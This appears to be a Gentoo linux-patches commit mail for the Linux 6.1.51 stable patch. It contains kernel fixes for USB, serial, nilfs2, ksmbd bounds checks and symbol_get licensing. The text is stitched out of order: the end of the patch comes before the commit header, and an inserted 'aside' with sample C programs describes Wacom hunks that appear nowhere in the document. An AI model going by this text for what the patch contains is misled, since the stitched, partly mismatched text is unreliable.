+--- a/drivers/net/ethernet/freescale/enetc/enetc_ptp.c
++++ b/drivers/net/ethernet/freescale/enetc/enetc_ptp.c
+@@ -8,7 +8,7 @@
+ #include "enetc.h"
+ 
+ int enetc_phc_index = -1;
+-EXPORT_SYMBOL(enetc_phc_index);
++EXPORT_SYMBOL_GPL(enetc_phc_index);
+ 
+ static struct ptp_clock_info enetc_ptp_caps = {
+ 	.owner		= THIS_MODULE,
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c b/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c
+index 68511597599e3..f7d392fce8c28 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c
+@@ -465,6 +465,7 @@ void mt76_connac2_mac_write_txwi(struct mt76_dev *dev, __le32 *txwi,
+ 				    BSS_CHANGED_BEACON_ENABLED));
+ 	bool inband_disc = !!(changed & (BSS_CHANGED_UNSOL_BCAST_PROBE_RESP |
+ 					 BSS_CHANGED_FILS_DISCOVERY));
++	bool amsdu_en = wcid->amsdu;
+ 
+ 	if (vif) {
+ 		struct mt76_vif *mvif = (struct mt76_vif *)vif->drv_priv;
+@@ -524,12 +525,14 @@ void mt76_connac2_mac_write_txwi(struct mt76_dev *dev, __le32 *txwi,
+ 	txwi[4] = 0;
+ 
+ 	val = FIELD_PREP(MT_TXD5_PID, pid);
+-	if (pid >= MT_PACKET_ID_FIRST)
++	if (pid >= MT_PACKET_ID_FIRST) {
+ 		val |= MT_TXD5_TX_STATUS_HOST;
++		amsdu_en = amsdu_en && !is_mt7921(dev);
++	}
+ 
+ 	txwi[5] = cpu_to_le32(val);
+ 	txwi[6] = 0;
+-	txwi[7] = wcid->amsdu ? cpu_to_le32(MT_TXD7_HW_AMSDU) : 0;
++	txwi[7] = amsdu_en ? cpu_to_le32(MT_TXD7_HW_AMSDU) : 0;
+ 
+ 	if (is_8023)
+ 		mt76_connac2_mac_write_txwi_8023(txwi, skb, wcid);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/main.c b/drivers/net/wireless/mediatek/mt76/mt7921/main.c
+index 60fbbd1ac2f78..172ba7199485d 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/main.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/main.c
+@@ -1280,7 +1280,7 @@ mt7921_set_antenna(struct ieee80211_hw *hw, u32 tx_ant, u32 rx_ant)
+ 		return -EINVAL;
+ 
+ 	if ((BIT(hweight8(tx_ant)) - 1) != tx_ant)
+-		tx_ant = BIT(ffs(tx_ant) - 1) - 1;
++		return -EINVAL;
+ 
+ 	mt7921_mutex_acquire(dev);
+ 
+diff --git a/drivers/pinctrl/pinctrl-amd.c b/drivers/pinctrl/pinctrl-amd.c
+index be6838c252f09..2b6d996e393e0 100644
+--- a/drivers/pinctrl/pinctrl-amd.c
++++ b/drivers/pinctrl/pinctrl-amd.c
+@@ -748,7 +748,7 @@ static int amd_pinconf_get(struct pinctrl_dev *pctldev,
+ 		break;
+ 
+ 	default:
+-		dev_err(&gpio_dev->pdev->dev, "Invalid config param %04x\n",
++		dev_dbg(&gpio_dev->pdev->dev, "Invalid config param %04x\n",
+ 			param);
+ 		return -ENOTSUPP;
+ 	}
+@@ -798,7 +798,7 @@ static int amd_pinconf_set(struct pinctrl_dev *pctldev, unsigned int pin,
+ 			break;
+ 
+ 		default:
+-			dev_err(&gpio_dev->pdev->dev,
++			dev_dbg(&gpio_dev->pdev->dev,
+ 				"Invalid config param %04x\n", param);
+ 			ret = -ENOTSUPP;
+ 		}
+diff --git a/drivers/rtc/rtc-ds1685.c b/drivers/rtc/rtc-ds1685.c
+index 5db9c737c022f..db7216f14164e 100644
+--- a/drivers/rtc/rtc-ds1685.c
++++ b/drivers/rtc/rtc-ds1685.c
+@@ -1434,7 +1434,7 @@ ds1685_rtc_poweroff(struct platform_device *pdev)
+ 		unreachable();
+ 	}
+ }
+-EXPORT_SYMBOL(ds1685_rtc_poweroff);
++EXPORT_SYMBOL_GPL(ds1685_rtc_poweroff);
+ /* ----------------------------------------------------------------------- */
+ 
+ 
+diff --git a/drivers/staging/rtl8712/os_intfs.c b/drivers/staging/rtl8712/os_intfs.c
+index 003e972051240..3ea70d042f9a0 100644
+--- a/drivers/staging/rtl8712/os_intfs.c
++++ b/drivers/staging/rtl8712/os_intfs.c
+@@ -323,6 +323,7 @@ int r8712_init_drv_sw(struct _adapter *padapter)
+ 	mp871xinit(padapter);
+ 	init_default_value(padapter);
+ 	r8712_InitSwLeds(padapter);
++	mutex_init(&padapter->mutex_start);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/staging/rtl8712/usb_intf.c b/drivers/staging/rtl8712/usb_intf.c
+index 37364d3101e21..df05213f922f4 100644
+--- a/drivers/staging/rtl8712/usb_intf.c
++++ b/drivers/staging/rtl8712/usb_intf.c
+@@ -567,7 +567,6 @@ static int r871xu_drv_init(struct usb_interface *pusb_intf,
+ 	if (rtl871x_load_fw(padapter))
+ 		goto deinit_drv_sw;
+ 	init_completion(&padapter->rx_filter_ready);
+-	mutex_init(&padapter->mutex_start);
+ 	return 0;
+ 
+ deinit_drv_sw:
+diff --git a/drivers/tty/serial/qcom_geni_serial.c b/drivers/tty/serial/qcom_geni_serial.c
+index 6f6c4e9b77435..d6f682ed15811 100644
+--- a/drivers/tty/serial/qcom_geni_serial.c
++++ b/drivers/tty/serial/qcom_geni_serial.c
+@@ -129,6 +129,7 @@ struct qcom_geni_serial_port {
+ 	u32 tx_fifo_width;
+ 	u32 rx_fifo_depth;
+ 	bool setup;
++	unsigned long clk_rate;
+ 	int (*handle_rx)(struct uart_port *uport, u32 bytes, bool drop);
+ 	unsigned int baud;
+ 	void *rx_fifo;
+@@ -1061,6 +1062,7 @@ static void qcom_geni_serial_set_termios(struct uart_port *uport,
+ 			baud * sampling_rate, clk_rate, clk_div);
+ 
+ 	uport->uartclk = clk_rate;
++	port->clk_rate = clk_rate;
+ 	dev_pm_opp_set_rate(uport->dev, clk_rate);
+ 	ser_clk_cfg = SER_CLK_EN;
+ 	ser_clk_cfg |= clk_div << CLK_DIV_SHFT;
+@@ -1330,10 +1332,13 @@ static void qcom_geni_serial_pm(struct uart_port *uport,
+ 
+ 	if (new_state == UART_PM_STATE_ON && old_state == UART_PM_STATE_OFF) {
+ 		geni_icc_enable(&port->se);
++		if (port->clk_rate)
++			dev_pm_opp_set_rate(uport->dev, port->clk_rate);
+ 		geni_se_resources_on(&port->se);
+ 	} else if (new_state == UART_PM_STATE_OFF &&
+ 			old_state == UART_PM_STATE_ON) {
+ 		geni_se_resources_off(&port->se);
++		dev_pm_opp_set_rate(uport->dev, 0);
+ 		geni_icc_disable(&port->se);
+ 	}
+ }
+diff --git a/drivers/tty/serial/sc16is7xx.c b/drivers/tty/serial/sc16is7xx.c
+index 93cf5f7888172..8411a0f312db0 100644
+--- a/drivers/tty/serial/sc16is7xx.c
++++ b/drivers/tty/serial/sc16is7xx.c
+@@ -1345,9 +1345,18 @@ static int sc16is7xx_gpio_direction_output(struct gpio_chip *chip,
+ 		state |= BIT(offset);
+ 	else
+ 		state &= ~BIT(offset);
+-	sc16is7xx_port_write(port, SC16IS7XX_IOSTATE_REG, state);
++
++	/*
++	 * If we write IOSTATE first, and then IODIR, the output value is not
++	 * transferred to the corresponding I/O pin.
++	 * The datasheet states that each register bit will be transferred to
++	 * the corresponding I/O pin programmed as output when writing to
++	 * IOSTATE. Therefore, configure direction first with IODIR, and then
++	 * set value after with IOSTATE.
++	 */
+ 	sc16is7xx_port_update(port, SC16IS7XX_IODIR_REG, BIT(offset),
+ 			      BIT(offset));
++	sc16is7xx_port_write(port, SC16IS7XX_IOSTATE_REG, state);
+ 
+ 	return 0;
+ }
+@@ -1439,6 +1448,12 @@ static int sc16is7xx_probe(struct device *dev,
+ 		s->p[i].port.fifosize	= SC16IS7XX_FIFO_SIZE;
+ 		s->p[i].port.flags	= UPF_FIXED_TYPE | UPF_LOW_LATENCY;
+ 		s->p[i].port.iobase	= i;
++		/*
++		 * Use all ones as membase to make sure uart_configure_port() in
++		 * serial_core.c does not abort for SPI/I2C devices where the
++		 * membase address is not applicable.
++		 */
++		s->p[i].port.membase	= (void __iomem *)~0;
+ 		s->p[i].port.iotype	= UPIO_PORT;
+ 		s->p[i].port.uartclk	= freq;
+ 		s->p[i].port.rs485_config = sc16is7xx_config_rs485;
+diff --git a/drivers/usb/chipidea/ci_hdrc_imx.c b/drivers/usb/chipidea/ci_hdrc_imx.c
+index 60b4de0a4f76d..caa91117ba429 100644
+--- a/drivers/usb/chipidea/ci_hdrc_imx.c
++++ b/drivers/usb/chipidea/ci_hdrc_imx.c
+@@ -175,10 +175,12 @@ static struct imx_usbmisc_data *usbmisc_get_init_data(struct device *dev)
+ 	if (of_usb_get_phy_mode(np) == USBPHY_INTERFACE_MODE_ULPI)
+ 		data->ulpi = 1;
+ 
+-	of_property_read_u32(np, "samsung,picophy-pre-emp-curr-control",
+-			&data->emp_curr_control);
+-	of_property_read_u32(np, "samsung,picophy-dc-vol-level-adjust",
+-			&data->dc_vol_level_adjust);
++	if (of_property_read_u32(np, "samsung,picophy-pre-emp-curr-control",
++			&data->emp_curr_control))
++		data->emp_curr_control = -1;
++	if (of_property_read_u32(np, "samsung,picophy-dc-vol-level-adjust",
++			&data->dc_vol_level_adjust))
++		data->dc_vol_level_adjust = -1;
+ 
+ 	return data;
+ }
+diff --git a/drivers/usb/chipidea/usbmisc_imx.c b/drivers/usb/chipidea/usbmisc_imx.c
+index 2318c7906acdb..a2cb4f48c84c6 100644
+--- a/drivers/usb/chipidea/usbmisc_imx.c
++++ b/drivers/usb/chipidea/usbmisc_imx.c
+@@ -657,13 +657,15 @@ static int usbmisc_imx7d_init(struct imx_usbmisc_data *data)
+ 			usbmisc->base + MX7D_USBNC_USB_CTRL2);
+ 		/* PHY tuning for signal quality */
+ 		reg = readl(usbmisc->base + MX7D_USB_OTG_PHY_CFG1);
+-		if (data->emp_curr_control && data->emp_curr_control <=
++		if (data->emp_curr_control >= 0 &&
++			data->emp_curr_control <=
+ 			(TXPREEMPAMPTUNE0_MASK >> TXPREEMPAMPTUNE0_BIT)) {
+ 			reg &= ~TXPREEMPAMPTUNE0_MASK;
+ 			reg |= (data->emp_curr_control << TXPREEMPAMPTUNE0_BIT);
+ 		}
+ 
+-		if (data->dc_vol_level_adjust && data->dc_vol_level_adjust <=
++		if (data->dc_vol_level_adjust >= 0 &&
++			data->dc_vol_level_adjust <=
+ 			(TXVREFTUNE0_MASK >> TXVREFTUNE0_BIT)) {
+ 			reg &= ~TXVREFTUNE0_MASK;
+ 			reg |= (data->dc_vol_level_adjust << TXVREFTUNE0_BIT);
+diff --git a/drivers/usb/dwc3/dwc3-meson-g12a.c b/drivers/usb/dwc3/dwc3-meson-g12a.c
+index eaea944ebd2ce..10298b91731eb 100644
+--- a/drivers/usb/dwc3/dwc3-meson-g12a.c
++++ b/drivers/usb/dwc3/dwc3-meson-g12a.c
+@@ -938,6 +938,12 @@ static int __maybe_unused dwc3_meson_g12a_resume(struct device *dev)
+ 			return ret;
+ 	}
+ 
++	if (priv->drvdata->usb_post_init) {
++		ret = priv->drvdata->usb_post_init(priv);
++		if (ret)
++			return ret;
++	}
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index 119641761c3b4..f13930b4534c1 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -259,6 +259,7 @@ static void option_instat_callback(struct urb *urb);
+ #define QUECTEL_PRODUCT_EM05G			0x030a
+ #define QUECTEL_PRODUCT_EM060K			0x030b
+ #define QUECTEL_PRODUCT_EM05G_CS		0x030c
++#define QUECTEL_PRODUCT_EM05GV2			0x030e
+ #define QUECTEL_PRODUCT_EM05CN_SG		0x0310
+ #define QUECTEL_PRODUCT_EM05G_SG		0x0311
+ #define QUECTEL_PRODUCT_EM05CN			0x0312
+@@ -1190,6 +1191,8 @@ static const struct usb_device_id option_ids[] = {
+ 	  .driver_info = RSVD(6) | ZLP },
+ 	{ USB_DEVICE_INTERFACE_CLASS(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM05G_GR, 0xff),
+ 	  .driver_info = RSVD(6) | ZLP },
++	{ USB_DEVICE_INTERFACE_CLASS(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM05GV2, 0xff),
++	  .driver_info = RSVD(4) | ZLP },
+ 	{ USB_DEVICE_INTERFACE_CLASS(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM05G_CS, 0xff),
+ 	  .driver_info = RSVD(6) | ZLP },
+ 	{ USB_DEVICE_INTERFACE_CLASS(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM05G_RS, 0xff),
+@@ -2232,6 +2235,10 @@ static const struct usb_device_id option_ids[] = {
+ 	  .driver_info = RSVD(0) | RSVD(1) | RSVD(6) },
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x0489, 0xe0db, 0xff),			/* Foxconn T99W265 MBIM */
+ 	  .driver_info = RSVD(3) },
++	{ USB_DEVICE_INTERFACE_CLASS(0x0489, 0xe0ee, 0xff),			/* Foxconn T99W368 MBIM */
++	  .driver_info = RSVD(3) },
++	{ USB_DEVICE_INTERFACE_CLASS(0x0489, 0xe0f0, 0xff),			/* Foxconn T99W373 MBIM */
++	  .driver_info = RSVD(3) },
+ 	{ USB_DEVICE(0x1508, 0x1001),						/* Fibocom NL668 (IOT version) */
+ 	  .driver_info = RSVD(4) | RSVD(5) | RSVD(6) },
+ 	{ USB_DEVICE(0x1782, 0x4d10) },						/* Fibocom L610 (AT mode) */
+diff --git a/drivers/usb/typec/tcpm/tcpci.c b/drivers/usb/typec/tcpm/tcpci.c
+index 72f8d1e876004..816945913ed0d 100644
+--- a/drivers/usb/typec/tcpm/tcpci.c
++++ b/drivers/usb/typec/tcpm/tcpci.c
+@@ -593,6 +593,10 @@ static int tcpci_init(struct tcpc_dev *tcpc)
+ 	if (time_after(jiffies, timeout))
+ 		return -ETIMEDOUT;
+ 
++	ret = tcpci_write16(tcpci, TCPC_FAULT_STATUS, TCPC_FAULT_STATUS_ALL_REG_RST_TO_DEFAULT);
++	if (ret < 0)
++		return ret;
++
+ 	/* Handle vendor init */
+ 	if (tcpci->data->init) {
+ 		ret = tcpci->data->init(tcpci, tcpci->data);
+diff --git a/drivers/usb/typec/tcpm/tcpm.c b/drivers/usb/typec/tcpm/tcpm.c
+index d5950ef9d1f35..5f45b82dd1914 100644
+--- a/drivers/usb/typec/tcpm/tcpm.c
++++ b/drivers/usb/typec/tcpm/tcpm.c
+@@ -2747,6 +2747,13 @@ static void tcpm_pd_ctrl_request(struct tcpm_port *port,
+ 			port->sink_cap_done = true;
+ 			tcpm_set_state(port, ready_state(port), 0);
+ 			break;
++		/*
++		 * Some port partners do not support GET_STATUS, avoid soft reset the link to
++		 * prevent redundant power re-negotiation
++		 */
++		case GET_STATUS_SEND:
++			tcpm_set_state(port, ready_state(port), 0);
++			break;
+ 		case SRC_READY:
+ 		case SNK_READY:
+ 			if (port->vdm_state > VDM_STATE_READY) {
+diff --git a/fs/erofs/zdata.c b/fs/erofs/zdata.c
+index 361f3c29897e8..1b91ac5be9610 100644
+--- a/fs/erofs/zdata.c
++++ b/fs/erofs/zdata.c
+@@ -869,6 +869,8 @@ hitted:
+ 	cur = end - min_t(erofs_off_t, offset + end - map->m_la, end);
+ 	if (!(map->m_flags & EROFS_MAP_MAPPED)) {
+ 		zero_user_segment(page, cur, end);
++		++spiltted;
++		tight = false;
+ 		goto next_part;
+ 	}
+ 	if (map->m_flags & EROFS_MAP_FRAGMENT) {
+diff --git a/fs/nilfs2/alloc.c b/fs/nilfs2/alloc.c
+index 6ce8617b562d5..7342de296ec3c 100644
+--- a/fs/nilfs2/alloc.c
++++ b/fs/nilfs2/alloc.c
+@@ -205,7 +205,8 @@ static int nilfs_palloc_get_block(struct inode *inode, unsigned long blkoff,
+ 	int ret;
+ 
+ 	spin_lock(lock);
+-	if (prev->bh && blkoff == prev->blkoff) {
++	if (prev->bh && blkoff == prev->blkoff &&
++	    likely(buffer_uptodate(prev->bh))) {
+ 		get_bh(prev->bh);
+ 		*bhp = prev->bh;
+ 		spin_unlock(lock);
+diff --git a/fs/nilfs2/inode.c b/fs/nilfs2/inode.c
+index d4c0895a88116..f625872321cca 100644
+--- a/fs/nilfs2/inode.c
++++ b/fs/nilfs2/inode.c
+@@ -1025,7 +1025,7 @@ int nilfs_load_inode_block(struct inode *inode, struct buffer_head **pbh)
+ 	int err;
+ 
+ 	spin_lock(&nilfs->ns_inode_lock);
+-	if (ii->i_bh == NULL) {
++	if (ii->i_bh == NULL || unlikely(!buffer_uptodate(ii->i_bh))) {
+ 		spin_unlock(&nilfs->ns_inode_lock);
+ 		err = nilfs_ifile_get_inode_block(ii->i_root->ifile,
+ 						  inode->i_ino, pbh);
+@@ -1034,7 +1034,10 @@ int nilfs_load_inode_block(struct inode *inode, struct buffer_head **pbh)
+ 		spin_lock(&nilfs->ns_inode_lock);
+ 		if (ii->i_bh == NULL)
+ 			ii->i_bh = *pbh;
+-		else {
++		else if (unlikely(!buffer_uptodate(ii->i_bh))) {
++			__brelse(ii->i_bh);
++			ii->i_bh = *pbh;
++		} else {
+ 			brelse(*pbh);
+ 			*pbh = ii->i_bh;
+ 		}
+diff --git a/fs/nilfs2/segment.c b/fs/nilfs2/segment.c
+index 21e8260112c8f..a4a147a983e0a 100644
+--- a/fs/nilfs2/segment.c
++++ b/fs/nilfs2/segment.c
+@@ -725,6 +725,11 @@ static size_t nilfs_lookup_dirty_data_buffers(struct inode *inode,
+ 		struct page *page = pvec.pages[i];
+ 
+ 		lock_page(page);
++		if (unlikely(page->mapping != mapping)) {
++			/* Exclude pages removed from the address space */
++			unlock_page(page);
++			continue;
++		}
+ 		if (!page_has_buffers(page))
+ 			create_empty_buffers(page, i_blocksize(inode), 0);
+ 		unlock_page(page);
+diff --git a/fs/smb/server/auth.c b/fs/smb/server/auth.c
+index 5e5e120edcc22..15e5684e328c1 100644
+--- a/fs/smb/server/auth.c
++++ b/fs/smb/server/auth.c
+@@ -355,6 +355,9 @@ int ksmbd_decode_ntlmssp_auth_blob(struct authenticate_message *authblob,
+ 		if (blob_len < (u64)sess_key_off + sess_key_len)
+ 			return -EINVAL;
+ 
++		if (sess_key_len > CIFS_KEY_SIZE)
++			return -EINVAL;
++
+ 		ctx_arc4 = kmalloc(sizeof(*ctx_arc4), GFP_KERNEL);
+ 		if (!ctx_arc4)
+ 			return -ENOMEM;
+diff --git a/fs/smb/server/oplock.c b/fs/smb/server/oplock.c
+index 4b210cdd75569..c81aee9ce7ec4 100644
+--- a/fs/smb/server/oplock.c
++++ b/fs/smb/server/oplock.c
+@@ -1492,7 +1492,7 @@ struct create_context *smb2_find_context_vals(void *open_req, const char *tag, i
+ 		    name_len < 4 ||
+ 		    name_off + name_len > cc_len ||
+ 		    (value_off & 0x7) != 0 ||
+-		    (value_off && (value_off < name_off + name_len)) ||
++		    (value_len && value_off < name_off + (name_len < 8 ? 8 : name_len)) ||
+ 		    ((u64)value_off + value_len > cc_len))
+ 			return ERR_PTR(-EINVAL);
+ 
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index f8ca44622d909..9b621fd993bb7 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -4322,7 +4322,7 @@ static int smb2_get_ea(struct ksmbd_work *work, struct ksmbd_file *fp,
+ 		if (!strncmp(name, XATTR_USER_PREFIX, XATTR_USER_PREFIX_LEN))
+ 			name_len -= XATTR_USER_PREFIX_LEN;
+ 
+-		ptr = (char *)(&eainfo->name + name_len + 1);
++		ptr = eainfo->name + name_len + 1;
+ 		buf_free_len -= (offsetof(struct smb2_ea_info, name) +
+ 				name_len + 1);
+ 		/* bailout if xattr can't fit in buf_free_len */
+diff --git a/fs/smb/server/smb2pdu.h b/fs/smb/server/smb2pdu.h
+index dd10f8031606b..665a837378540 100644
+--- a/fs/smb/server/smb2pdu.h
++++ b/fs/smb/server/smb2pdu.h
+@@ -410,7 +410,7 @@ struct smb2_ea_info {
+ 	__u8   Flags;
+ 	__u8   EaNameLength;
+ 	__le16 EaValueLength;
+-	char name[1];
++	char name[];
+ 	/* optionally followed by value */
+ } __packed; /* level 15 Query */
+ 
+diff --git a/fs/smb/server/transport_rdma.c b/fs/smb/server/transport_rdma.c
+index c06efc020bd95..7578200f63b1d 100644
+--- a/fs/smb/server/transport_rdma.c
++++ b/fs/smb/server/transport_rdma.c
+@@ -1366,24 +1366,35 @@ static int smb_direct_rdma_xmit(struct smb_direct_transport *t,
+ 	LIST_HEAD(msg_list);
+ 	char *desc_buf;
+ 	int credits_needed;
+-	unsigned int desc_buf_len;
+-	size_t total_length = 0;
++	unsigned int desc_buf_len, desc_num = 0;
+ 
+ 	if (t->status != SMB_DIRECT_CS_CONNECTED)
+ 		return -ENOTCONN;
+ 
++	if (buf_len > t->max_rdma_rw_size)
++		return -EINVAL;
++
+ 	/* calculate needed credits */
+ 	credits_needed = 0;
+ 	desc_buf = buf;
+ 	for (i = 0; i < desc_len / sizeof(*desc); i++) {
++		if (!buf_len)
++			break;
++
+ 		desc_buf_len = le32_to_cpu(desc[i].length);
++		if (!desc_buf_len)
++			return -EINVAL;
++
++		if (desc_buf_len > buf_len) {
++			desc_buf_len = buf_len;
++			desc[i].length = cpu_to_le32(desc_buf_len);
++			buf_len = 0;
++		}
+ 
+ 		credits_needed += calc_rw_credits(t, desc_buf, desc_buf_len);
+ 		desc_buf += desc_buf_len;
+-		total_length += desc_buf_len;
+-		if (desc_buf_len == 0 || total_length > buf_len ||
+-		    total_length > t->max_rdma_rw_size)
+-			return -EINVAL;
++		buf_len -= desc_buf_len;
++		desc_num++;
+ 	}
+ 
+ 	ksmbd_debug(RDMA, "RDMA %s, len %#x, needed credits %#x\n",
+@@ -1395,7 +1406,7 @@ static int smb_direct_rdma_xmit(struct smb_direct_transport *t,
+ 
+ 	/* build rdma_rw_ctx for each descriptor */
+ 	desc_buf = buf;
+-	for (i = 0; i < desc_len / sizeof(*desc); i++) {
++	for (i = 0; i < desc_num; i++) {
+ 		msg = kzalloc(offsetof(struct smb_direct_rdma_rw_msg, sg_list) +
+ 			      sizeof(struct scatterlist) * SG_CHUNK_SIZE, GFP_KERNEL);
+ 		if (!msg) {
+diff --git a/include/linux/usb/tcpci.h b/include/linux/usb/tcpci.h
+index 17657451c762c..77eb40b918d7d 100644
+--- a/include/linux/usb/tcpci.h
++++ b/include/linux/usb/tcpci.h
+@@ -103,6 +103,7 @@
+ #define TCPC_POWER_STATUS_SINKING_VBUS	BIT(0)
+ 
+ #define TCPC_FAULT_STATUS		0x1f
++#define TCPC_FAULT_STATUS_ALL_REG_RST_TO_DEFAULT BIT(7)
+ 
+ #define TCPC_ALERT_EXTENDED		0x21
+ 
+diff --git a/kernel/module/main.c b/kernel/module/main.c
+index 7a6f43d2b7757..7a376e26de85b 100644
+--- a/kernel/module/main.c
++++ b/kernel/module/main.c
+@@ -1214,12 +1214,20 @@ void *__symbol_get(const char *symbol)
+ 	};
+ 
+ 	preempt_disable();
+-	if (!find_symbol(&fsa) || strong_try_module_get(fsa.owner)) {
+-		preempt_enable();
+-		return NULL;
++	if (!find_symbol(&fsa))
++		goto fail;
++	if (fsa.license != GPL_ONLY) {
++		pr_warn("failing symbol_get of non-GPLONLY symbol %s.\n",
++			symbol);
++		goto fail;
+ 	}
++	if (strong_try_module_get(fsa.owner))
++		goto fail;
+ 	preempt_enable();
+ 	return (void *)kernel_symbol_value(fsa.sym);
++fail:
++	preempt_enable();
++	return NULL;
+ }
+ EXPORT_SYMBOL_GPL(__symbol_get);
+ 
+diff --git a/sound/usb/stream.c b/sound/usb/stream.c
+index f10f4e6d3fb85..3d4add94e367d 100644
+--- a/sound/usb/stream.c
++++ b/sound/usb/stream.c
+@@ -1093,6 +1093,7 @@ static int __snd_usb_parse_audio_interface(struct snd_usb_audio *chip,
+ 	int i, altno, err, stream;
+ 	struct audioformat *fp = NULL;
+ 	struct snd_usb_power_domain *pd = NULL;
++	bool set_iface_first;
+ 	int num, protocol;
+ 
+ 	dev = chip->dev;
+@@ -1223,11 +1224,19 @@ static int __snd_usb_parse_audio_interface(struct snd_usb_audio *chip,
+ 				return err;
+ 		}
+ 
++		set_iface_first = false;
++		if (protocol == UAC_VERSION_1 ||
++		    (chip->quirk_flags & QUIRK_FLAG_SET_IFACE_FIRST))
++			set_iface_first = true;
++
+ 		/* try to set the interface... */
+ 		usb_set_interface(chip->dev, iface_no, 0);
++		if (set_iface_first)
++			usb_set_interface(chip->dev, iface_no, altno);
+ 		snd_usb_init_pitch(chip, fp);
+ 		snd_usb_init_sample_rate(chip, fp, fp->rate_max);
+-		usb_set_interface(chip->dev, iface_no, altno);
++		if (!set_iface_first)
++			usb_set_interface(chip->dev, iface_no, altno);
+ 	}
+ 	return 0;
+ }
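
Aside, not part of the committed patch above: the Wacom hunks stamp each remote packet with a monotonic timestamp and tear the battery object down once no activity has been seen for WACOM_REMOTE_BATTERY_TIMEOUT (21 s expressed in nanoseconds), with an active_time of 0 meaning "never seen". A standalone sketch of that staleness test against CLOCK_MONOTONIC (the main() harness is illustrative):

#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <time.h>

#define BATTERY_TIMEOUT_NS 21000000000ll	/* matches the patch */

static int64_t now_ns(void)
{
	struct timespec ts;

	clock_gettime(CLOCK_MONOTONIC, &ts);
	return (int64_t)ts.tv_sec * 1000000000ll + ts.tv_nsec;
}

static bool battery_stale(int64_t active_time)
{
	/* 0 means the remote was never active, so nothing to expire */
	return active_time != 0 && now_ns() - active_time > BATTERY_TIMEOUT_NS;
}

int main(void)
{
	int64_t t = now_ns();

	printf("stale now: %d, never-active: %d\n",
	       battery_stale(t), battery_stale(0));
	return 0;
}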

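The ci_hdrc_imx/usbmisc hunks rely on the same kind of sentinel: an absent optional tuning property is now stored as -1, so a property legitimately set to 0 is no longer confused with "not configured" and gets programmed. The idea in miniature, with lookup_u32() as a hypothetical stand-in for of_property_read_u32() and TUNE_MAX an illustrative bound rather than the real register mask:

#include <stdio.h>

#define TUNE_MAX 15	/* illustrative field width, not the real mask */

/* hypothetical stand-in for of_property_read_u32(): returns 0 and
 * fills *val when the property exists, nonzero when it is absent */
static int lookup_u32(int present, unsigned int raw, int *val)
{
	if (!present)
		return -1;
	*val = raw;
	return 0;
}

static void apply(int val)
{
	if (val >= 0 && val <= TUNE_MAX)	/* -1 (absent) falls through */
		printf("program field to %d\n", val);
	else
		printf("leave hardware default\n");
}

int main(void)
{
	int val;

	if (lookup_u32(1, 0, &val))	/* property present and set to zero */
		val = -1;
	apply(val);			/* 0 is now applied */

	if (lookup_u32(0, 0, &val))	/* property absent */
		val = -1;
	apply(val);			/* hardware default kept */
	return 0;
}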

* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-09-02  9:56 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-09-02  9:56 UTC (permalink / raw
  To: gentoo-commits

commit:     0fc743e4891da8f3fb4d6255a2dbdde81b184016
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Sep  2 09:56:29 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Sep  2 09:56:29 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=0fc743e4

Linux patch 6.1.51

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |   4 +
 1050_linux-6.1.51.patch | 550 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 554 insertions(+)

diff --git a/0000_README b/0000_README
index 870654fc..641d98d3 100644
--- a/0000_README
+++ b/0000_README
@@ -243,6 +243,10 @@ Patch:  1049_linux-6.1.50.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.50
 
+Patch:  1050_linux-6.1.51.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.51
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1050_linux-6.1.51.patch b/1050_linux-6.1.51.patch
new file mode 100644
index 00000000..1b1e4e60
--- /dev/null
+++ b/1050_linux-6.1.51.patch
@@ -0,0 +1,550 @@
+diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
+index 882b6198dd0d1..31af352b4762d 100644
+--- a/Documentation/admin-guide/kernel-parameters.txt
++++ b/Documentation/admin-guide/kernel-parameters.txt
+@@ -6164,10 +6164,6 @@
+ 			-1: disable all critical trip points in all thermal zones
+ 			<degrees C>: override all critical trip points
+ 
+-	thermal.nocrt=	[HW,ACPI]
+-			Set to disable actions on ACPI thermal zone
+-			critical and hot trip points.
+-
+ 	thermal.off=	[HW,ACPI]
+ 			1: disable ACPI thermal control
+ 
+diff --git a/Makefile b/Makefile
+index e5e1fdeef8bf0..e7c344d5af156 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 50
++SUBLEVEL = 51
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/kernel/module-plts.c b/arch/arm/kernel/module-plts.c
+index 1fc309b41f944..8d809724cde52 100644
